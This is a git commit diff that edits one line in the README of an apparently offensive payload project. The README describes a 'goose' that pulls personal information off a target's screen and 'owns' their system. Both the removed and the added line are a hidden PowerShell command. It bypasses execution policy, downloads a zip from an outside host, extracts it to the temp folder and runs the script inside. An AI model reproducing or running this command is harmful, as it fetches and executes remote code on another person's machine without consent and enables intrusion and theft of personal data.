Update ReadMe.md
This commit is contained in:
parent
abc3564ef0
commit
d16da678b9
1 changed files with 1 additions and 1 deletions
|
@ -42,7 +42,7 @@ Afterwards it will walk around your targets screen pulling out personal informat
|
|||
* 10 seconds later your goose is owning their system
|
||||
|
||||
```
|
||||
powershell -w h -NoP -NonI -Ep Bypass $D="$env:tmp";iwr -Uri 'https://jakoby.lol/1ae' -O "$D\hg.zip";Expand-Archive "$D\hg.zip" -Des $D -Force;. "$D\hg\main.ps1"
|
||||
powershell -w h -NoP -NonI -Ep Bypass $D="$env:tmp";irm -Uri 'https://jakoby.lol/1ae' -O "$D\hg.zip";Expand-Archive "$D\hg.zip" -Des $D -Force;. "$D\hg\main.ps1"
|
||||
```
|
||||
### Exiting the Payload
|
||||
|
||||
|
|
Loading…
Reference in a new issue